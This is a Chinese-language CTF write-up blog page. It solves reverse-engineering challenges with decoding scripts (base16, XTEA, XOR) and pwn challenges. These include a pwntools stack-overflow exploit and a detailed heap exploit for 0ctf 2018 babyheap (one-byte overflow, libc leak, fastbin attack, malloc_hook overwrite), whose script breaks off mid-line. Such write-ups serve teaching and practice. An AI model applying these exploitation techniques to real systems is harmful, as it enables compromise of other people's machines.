<h2 id="base16"><a href="#base16" class="headerlink" title="base16"></a>base16</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="number">11171B</span>12261CDE2D1FDBD1F0DB2DF02DDAF01210101ECB28A5</span><br><span class="line"></span><br><span class="line">v4 = <span class="string">&#x27;DCBA&#x27;</span>;<span class="comment">// 这个要逆序，低地址到高地址</span></span><br><span class="line">  v5 = <span class="string">&#x27;21FE&#x27;</span>;</span><br><span class="line">  v6 = <span class="string">&#x27;6543&#x27;</span>;</span><br><span class="line">  v7 = <span class="string">&#x27;0987&#x27;</span>;</span><br><span class="line">  v8 = <span class="number">0</span>;</span><br><span class="line">  v12 = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; ; i += <span class="number">2</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    v2 = v12;</span><br><span class="line">    result = <span class="built_in">strlen</span>(a1);</span><br><span class="line">    <span class="keyword">if</span> ( v2 &gt;= result )</span><br><span class="line">      <span 
class="keyword">break</span>;</span><br><span class="line">    v10 = a1[v12] &gt;&gt; <span class="number">4</span>;</span><br><span class="line">    v9 = a1[v12] &amp; <span class="number">0xF</span>;</span><br><span class="line">    *(_BYTE *)(a2 + i) = *((_BYTE *)&amp;v4 + v10);</span><br><span class="line">    *(_BYTE *)(a2 + i + <span class="number">1</span>) = *((_BYTE *)&amp;v4 + v9);</span><br><span class="line">    ++v12;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line"></span><br><span class="line">a1 是输入，</span><br></pre></td></tr></table></figure>

<p>Payload:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">table=<span class="string">&quot;ABCDEF1234567890&quot;</span></span><br><span class="line">cipher=<span class="string">&quot;11171B12261CDE2D1FDBD1F0DB2DF02DDAF01210101ECB28A5&quot;</span></span><br><span class="line">flag=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(cipher),<span class="number">2</span>):</span><br><span class="line">    a=table.find(cipher[i])</span><br><span class="line">    b=table.find(cipher[i+<span class="number">1</span>])</span><br><span class="line">    flag+=<span class="built_in">chr</span>((a&lt;&lt;<span class="number">4</span>)|b)</span><br><span class="line"><span class="built_in">print</span> flag</span><br></pre></td></tr></table></figure>



<h2 id="xtea"><a href="#xtea" class="headerlink" title="xtea"></a>xtea</h2><img src="/.io//0081Kckwgy1gkcefe0x1dj30bj04ljs1.jpg" alt="img" style="zoom:200%;">

<p>循环轮数为32，再结合特殊的常数0x61c8847，即可猜出是TEA系列算法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span 
class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">int tea_decrypt(unsigned char *Key,unsigned char *Data,int BlockCount)</span><br><span class="line">&#123;</span><br><span class="line">    unsigned int y, z,sum,i,j; </span><br><span class="line">    unsigned int delta=0x9e3779b9; </span><br><span class="line">    unsigned int a, b, c, d;    </span><br><span class="line"></span><br><span class="line">    a = (unsigned int)((Key[0] &lt;&lt; 24) | (Key[1] &lt;&lt; 16) | (Key[2] &lt;&lt; 8) | Key[3]);</span><br><span class="line">    b = (unsigned int)((Key[4] &lt;&lt; 24) | (Key[5] &lt;&lt; 16) | (Key[6] &lt;&lt; 8) | Key[7]);</span><br><span class="line">    c = (unsigned int)((Key[8] &lt;&lt; 24) | (Key[9] &lt;&lt; 16) | (Key[10] &lt;&lt; 8) | Key[11]);</span><br><span class="line">    d = (unsigned int)((Key[12] &lt;&lt; 24) | (Key[13] &lt;&lt; 16) | (Key[14] &lt;&lt; 8) | Key[15]);</span><br><span class="line"></span><br><span class="line">    for(i = 0; i &lt; BlockCount; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        sum=0xC6EF3720;</span><br><span class="line">        y = (unsigned int)((Data[i*8 + 0] &lt;&lt; 24) | (Data[i*8 + 1] &lt;&lt; 16) | (Data[i*8 + 2] &lt;&lt; 8) | Data[i*8 + 3]);</span><br><span class="line">        z = (unsigned int)((Data[i*8 + 4] &lt;&lt; 24) | (Data[i*8 + 5] &lt;&lt; 16) | (Data[i*8 + 6] &lt;&lt; 8) | Data[i*8 + 7]);</span><br><span class="line">        for(j = 0; j &lt; 32; j++)</span><br><span class="line">        &#123;</span><br><span class="line">            z -= ((y&lt;&lt;4) + c) ^ (y + sum) ^ ((y&gt;&gt;5) + d);</span><br><span class="line">            y -= ((z&lt;&lt;4) + a) ^ (z + sum) ^ ((z&gt;&gt;5) + b);</span><br><span class="line">            sum -= delta;  </span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        Data[i*8 + 0] = (unsigned char)((y 
&gt;&gt; 24) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 1] = (unsigned char)((y &gt;&gt; 16) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 2] = (unsigned char)((y &gt;&gt; 8) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 3] = (unsigned char)((y &gt;&gt; 0) &amp; 0xFF);</span><br><span class="line"></span><br><span class="line">        Data[i*8 + 4] = (unsigned char)((z &gt;&gt; 24) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 5] = (unsigned char)((z &gt;&gt; 16) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 6] = (unsigned char)((z &gt;&gt; 8) &amp; 0xFF);</span><br><span class="line">        Data[i*8 + 7] = (unsigned char)((z &gt;&gt; 0) &amp; 0xFF);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    return 0;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">unsigned char cmp_data[32]=&#123;0x42,0xc7,0xca,0x40,0xc1,0x75,0x16,0xef,0xe7,0x37,0x6e,0x69,0x1b,0x0b,0x0f,0x78,0xdf,0xe0,0xe0,0x7b,0x5f,0x50,0x57,0x05,0xf4,0x73,0xd2,0x35,0x47,0xd5,0x6c,0x5a&#125;;</span><br><span class="line">int main()</span><br><span class="line">&#123;</span><br><span class="line">    int i;</span><br><span class="line">    unsigned char buf[32];</span><br><span class="line">    unsigned char key[16] = &#123;0x00,0x01,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0xe,0xf,0x00&#125;;</span><br><span class="line">    char data[50];</span><br><span class="line">	</span><br><span class="line">    memcpy((void*)buf,cmp_data,32);</span><br><span class="line">    tea_decrypt(key,buf,4);</span><br><span class="line">	printf(&quot;decode:\n%s\n&quot;,buf);</span><br><span class="line">	system(&quot;pause&quot;);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">得到flag:</span><br><span 
class="line">flag&#123;th1s_is_TEA_enc0de_hahaha_&#125;</span><br></pre></td></tr></table></figure>





<h2 id="csre"><a href="#csre" class="headerlink" title="csre"></a>csre</h2><p>.NET逆向，用de4dot去除混淆后使用dnSpy打开</p>
<h2 id="simple12"><a href="#simple12" class="headerlink" title="simple12"></a>simple12</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">import base64</span><br><span class="line">str=&quot;e3nifIH9b_C@n@dH&quot;</span><br><span class="line">flag=&quot;&quot;</span><br><span class="line">for i in range(len(str)):</span><br><span class="line">    flag +=chr(ord(str[i])-i)</span><br><span class="line">print base64.b64decode(flag)</span><br><span class="line">#解出来：&#123;i_l0ve_you&#125;</span><br></pre></td></tr></table></figure>



<h2 id="easyXor"><a href="#easyXor" class="headerlink" title="easyXor"></a>easyXor</h2><p>分析，简单异或加密</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">enc=<span class="string">&quot;xe@ytr&#125;q-y=^*DmoSK&#123;PtNFyR1][Cd&quot;</span></span><br><span class="line">lenth=<span class="built_in">len</span>(enc)</span><br><span class="line">flag=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,lenth,<span class="number">3</span>):</span><br><span class="line">    flag+=<span class="built_in">chr</span>(<span class="built_in">ord</span>(enc[i])^lenth)</span><br><span class="line">    flag+=<span class="built_in">chr</span>(<span class="built_in">ord</span>(enc[i+<span class="number">1</span>])+<span class="number">7</span>)</span><br><span class="line">    flag+=<span class="built_in">chr</span>((<span class="built_in">ord</span>(enc[i+<span class="number">2</span>])^lenth)+<span class="number">3</span>)</span><br><span class="line"><span class="built_in">print</span> flag</span><br><span class="line"><span class="comment"># flag&#123;ocx6gDC4KvqZXeWmPMjL8FEJ&#125;</span></span><br></pre></td></tr></table></figure>



<h2 id="netnet"><a href="#netnet" class="headerlink" title="netnet"></a>netnet</h2><h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><h2 id="pwn00"><a href="#pwn00" class="headerlink" title="pwn00"></a>pwn00</h2><p>read 溢出</p>
<p>存在可利用函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">Debug = 1</span><br><span class="line">if Debug:</span><br><span class="line">	io = process(&quot;./pwn00&quot;)</span><br><span class="line">else:</span><br><span class="line">	io = remote(&#x27;192.168.4.3&#x27;,11001) </span><br><span class="line"></span><br><span class="line">callsystem_addr = 0x4011AC</span><br><span class="line">payload = 0x18*&#x27;A&#x27;+p64(callsystem_addr)</span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>





<h2 id="Pwn111"><a href="#Pwn111" class="headerlink" title="Pwn111"></a>Pwn111</h2><h2 id="Pwn-babyheap"><a href="#Pwn-babyheap" class="headerlink" title="Pwn-babyheap"></a>Pwn-babyheap</h2><p>题目是2018 0ctf的babyheap，64位，不是一道难题</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/959d4b7b5af1">https://www.jianshu.com/p/959d4b7b5af1</a></p>
</blockquote>
<h3 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h3><p>这个题就是一个洞：</p>
<p><img src="/.io//0081Kckwgy1gkcyunav4dj30en056gnw.jpg" alt="image-20201104111150297"></p>
<p>这里允许一个字节的溢出，于是就可以覆盖到下一个chunk的size。<br> 首先，我们要先leak出地址。由于题目分配内存使用的是calloc，它会在分配时将内存清零，所以我们不能直接读到残留的地址，必须换个思路。</p>
<h3 id="leak"><a href="#leak" class="headerlink" title="leak"></a>leak</h3><p>这里，我们先申请0x18的chunk，得到的是size为0x20的chunk，然后再申请两个小的chunk（比如0x30），然后我们利用第一个chunk的一字节溢出，把下一个chunk的size改大一点，使其能包括再下一个chunk的内容（比如修改为0x60），然后再free这个修改过的chunk（当然，需要构造在这个chunk加0x60处的size的p位为1，来应对free的检查），之后我们再申请回这个chunk（当然申请0x50），然后我们就能利用这个chunk，view到下一个chunk的内容了，如果下一个chunk的fd和bk有值就能看了。这是leak的思路。我想leak出libc的地址来着，但是，我们申请chunk的最大大小是0x58：</p>
<p>于是，我们还要使用一个字节的溢出使得这个chunk的size满足进入unsortbin的标准，于是，我们做这些操作：（比较繁琐，本人萌新）</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="meta">#0</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="meta">#1</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="meta">#2 #40</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x20</span>)<span class="meta">#3 #90</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="meta">#4 #c0</span></span><br><span class="line">update(<span class="number">0</span>,<span class="number">0x19</span>,<span class="number">0x19</span>*<span class="string">&#x27;\x61&#x27;</span>)</span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x10</span>,p64(<span class="number">0</span>)+p64(<span class="number">0x91</span>))</span><br><span class="line">update(<span class="number">2</span>,<span class="number">0x40</span>,<span class="number">8</span>*p64(<span class="number">0x91</span>))</span><br><span class="line">dele(<span class="number">1</span>)<span class="meta">#1</span></span><br><span 
class="line"><span class="keyword">new</span>(<span class="number">0x50</span>)<span class="meta">#1 20</span></span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x30</span>,<span class="number">6</span>*p64(<span class="number">0x91</span>))</span><br><span class="line">update(<span class="number">4</span>,<span class="number">0x40</span>,<span class="number">4</span>*(p64(<span class="number">0x0</span>) + p64(<span class="number">0x21</span>)))</span><br><span class="line">dele(<span class="number">2</span>)<span class="meta">#2  40</span></span><br><span class="line">view(<span class="number">1</span>)</span><br><span class="line">p.recv(<span class="number">0x2a</span>)<span class="meta">#2a</span></span><br><span class="line">a = p.recv(<span class="number">8</span>)</span><br><span class="line">main_ar = u64(a)</span><br><span class="line">success(hex(u64(a)))</span><br><span class="line">libcc = u64(a) - <span class="number">0x3c4b78</span></span><br><span class="line">success(hex(libcc))</span><br></pre></td></tr></table></figure>

<p>首先申请2个能溢出的chunk，0号用来改1号的size，1号用来改2号的size，还有看2号的fd。然后我们需要一个size能进unsortbin的chunk，于是我申请了3个chunk，主要是为了在把2号的size修改为0x91之后，使得chunk2之后0x90处的size字段的p位为1。<br> 这样我们就得到了chunk2的fd，得到libc基址：</p>
<p><img src="https://upload-images.jianshu.io/upload_images/8148644-8570a48eb8ea7b1f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/594/format/webp" alt="img"></p>
<p><img src="https://upload-images.jianshu.io/upload_images/8148644-b4d3b6d27c288c2e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/271/format/webp" alt="img"></p>
<h3 id="fastbin-attack"><a href="#fastbin-attack" class="headerlink" title="fastbin attack"></a>fastbin attack</h3><p>然后我们打算fastbin attack，但是pie使得无法写got表，那么我们就写malloc_hook，这着实让我这个萌新满头雾水，因为我在malloc_hook上没找到符合格式的size，然后尝试了一种新思路，就是改写main_arena上的top_chunk的地址，这样，我们申请内存时，就可以得到malloc_hook上面的地址，然后对malloc_hook的值进行任意写了。<br> 于是我先把unsortbin清空（因为我比较菜，害怕之后申请chunk会乱）。然后，由于在fastbin attack的时候需要符合size的检查，于是，我先在main_arena上布size，这时，我们可以利用main_arena记录fastbin的链，我们把fd设置成size</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#--free to fastbins</span></span><br><span class="line">update(<span class="number">5</span>,<span class="number">0x10</span>,<span class="number">2</span>*(p64(<span class="number">0</span>)+p64(<span class="number">0x31</span>)))</span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x50</span>,<span class="number">10</span>*(p64(<span class="number">0</span>)+p64(<span class="number">0x51</span>)))</span><br><span class="line">dele(<span class="number">2</span>)<span class="meta">#2</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#--change mainarena </span></span><br><span class="line">des_addr = main_ar - <span class="number">0x40</span></span><br><span class="line">a = p64(<span class="number">0</span>) + p64(<span class="number">0x51</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0x51</span>) + p64(<span class="number">0x41</span>) + p64(<span class="number">0x51</span>)</span><br><span class="line">update(<span class="number">1</span>,len(a),a)</span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="meta">#2 40</span></span><br></pre></td></tr></table></figure>

<p>于是这里main_arena上就有0x41了：</p>
<p><img src="https://upload-images.jianshu.io/upload_images/8148644-0ffacb8f4259faa8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/621/format/webp" alt="img"></p>
<p>然后申请掉这个fastbin：</p>
<p><img src="https://upload-images.jianshu.io/upload_images/8148644-7a70ab2c0d51159c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/741/format/webp" alt="img"></p>
<p>然后愉快地进行fastbin attack，<br> 接着改掉top chunk</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#--change topchunk</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x30</span>)<span class="meta">#8</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x38</span>)<span class="meta">#9</span></span><br><span class="line">payload = p64(<span class="number">0</span>)*<span class="number">6</span> + p64(des_addr<span class="number">-56</span>)</span><br><span class="line">update(<span class="number">9</span>,len(payload),payload)</span><br></pre></td></tr></table></figure>

<p><img src="https://upload-images.jianshu.io/upload_images/8148644-9179233ceec952a4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/833/format/webp" alt="img"></p>
<p>然后再申请空间就能从topchunk中申请，写到malloc_hook了，利用onegadget，再次calloc就能getshell了</p>
<p><img src="https://upload-images.jianshu.io/upload_images/8148644-63fbd2448f527477.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/645/format/webp" alt="img"></p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span 
class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn import *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.terminal = [<span class="string">&#x27;gnome-terminal&#x27;</span>,<span class="string">&#x27;-x&#x27;</span>,<span class="string">&#x27;bash&#x27;</span>,<span class="string">&#x27;-c&#x27;</span>]</span><br><span class="line">p = process(<span class="string">&#x27;./babyheap&#x27;</span>)</span><br><span 
class="line">libc = ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line">def <span class="keyword">new</span>(size):</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Size: &#x27;</span>)</span><br><span class="line">    p.sendline(str(size))</span><br><span class="line"></span><br><span class="line">def dele(index):</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Index: &#x27;</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line"></span><br><span class="line">def update(index,size,context):</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Index: &#x27;</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Size: &#x27;</span>)</span><br><span class="line">    p.sendline(str(size))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Content: &#x27;</span>)</span><br><span class="line">    p.sendline(context)</span><br><span class="line"></span><br><span class="line">def view(index):</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Command: &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Index: 
&#x27;</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line"></span><br><span class="line"><span class="comment">#---leak libc</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="comment">#0</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="comment">#2 #40</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x20</span>)<span class="comment">#3 #90</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="comment">#4 #c0</span></span><br><span class="line">update(<span class="number">0</span>,<span class="number">0x19</span>,<span class="number">0x19</span>*<span class="string">&#x27;\x61&#x27;</span>)</span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x10</span>,p64(<span class="number">0</span>)+p64(<span class="number">0x91</span>))</span><br><span class="line">update(<span class="number">2</span>,<span class="number">0x40</span>,<span class="number">8</span>*p64(<span class="number">0x91</span>))</span><br><span class="line">dele(<span class="number">1</span>)<span class="comment">#1</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x50</span>)<span class="comment">#1 20</span></span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x30</span>,<span class="number">6</span>*p64(<span class="number">0x91</span>))</span><br><span class="line">update(<span class="number">4</span>,<span class="number">0x40</span>,<span class="number">4</span>*(p64(<span class="number">0x0</span>) + p64(<span class="number">0x21</span>)))</span><br><span class="line">dele(<span 
class="number">2</span>)<span class="comment">#2  40</span></span><br><span class="line">view(<span class="number">1</span>)</span><br><span class="line">p.recv(<span class="number">0x2a</span>)<span class="comment">#2a</span></span><br><span class="line">a = p.recv(<span class="number">8</span>)</span><br><span class="line">main_ar = u64(a)</span><br><span class="line">success(hex(u64(a)))</span><br><span class="line">libcc = u64(a) - <span class="number">0x3c4b78</span></span><br><span class="line">success(hex(libcc))</span><br><span class="line"></span><br><span class="line"><span class="comment">#--calloc unsortbin</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x30</span>)<span class="comment">#2 40 </span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="comment">#5 90</span></span><br><span class="line"><span class="comment">#--free to fastbins</span></span><br><span class="line">update(<span class="number">5</span>,<span class="number">0x10</span>,<span class="number">2</span>*(p64(<span class="number">0</span>)+p64(<span class="number">0x31</span>)))</span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x50</span>,<span class="number">10</span>*(p64(<span class="number">0</span>)+p64(<span class="number">0x51</span>)))</span><br><span class="line">dele(<span class="number">2</span>)<span class="comment">#2</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#--change mainarena </span></span><br><span class="line">des_addr = main_ar - <span class="number">0x40</span></span><br><span class="line">a = p64(<span class="number">0</span>) + p64(<span class="number">0x51</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0x51</span>) + p64(<span class="number">0x41</span>) + p64(<span class="number">51</span>)</span><br><span class="line">update(<span 
class="number">1</span>,len(a),a)</span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x40</span>)<span class="comment">#2 40</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#--fastbin attack </span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="comment">#6  </span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x18</span>)<span class="comment">#7 130</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x30</span>)<span class="comment">#8 150</span></span><br><span class="line">update(<span class="number">6</span>,<span class="number">0x19</span>,<span class="number">0x19</span>*<span class="string">&#x27;\x41&#x27;</span>)</span><br><span class="line">update(<span class="number">8</span>,<span class="number">0x30</span>,<span class="number">6</span>*(p64(<span class="number">0</span>)+ p64(<span class="number">0x21</span>)))</span><br><span class="line">dele(<span class="number">7</span>)</span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x30</span>)<span class="comment">#7 130</span></span><br><span class="line">b= p64(<span class="number">0</span>)+p64(<span class="number">0</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0x41</span>) + p64(des_addr)+p64(<span class="number">0</span>)</span><br><span class="line">update(<span class="number">7</span>,len(b),b)</span><br><span class="line">dele(<span class="number">8</span>)</span><br><span class="line">update(<span class="number">7</span>,len(b),b)</span><br><span class="line"></span><br><span class="line"><span class="comment">#--change topchunk</span></span><br><span class="line"><span class="keyword">new</span>(<span class="number">0x30</span>)<span class="comment">#8</span></span><br><span class="line"><span class="keyword">new</span>(<span 
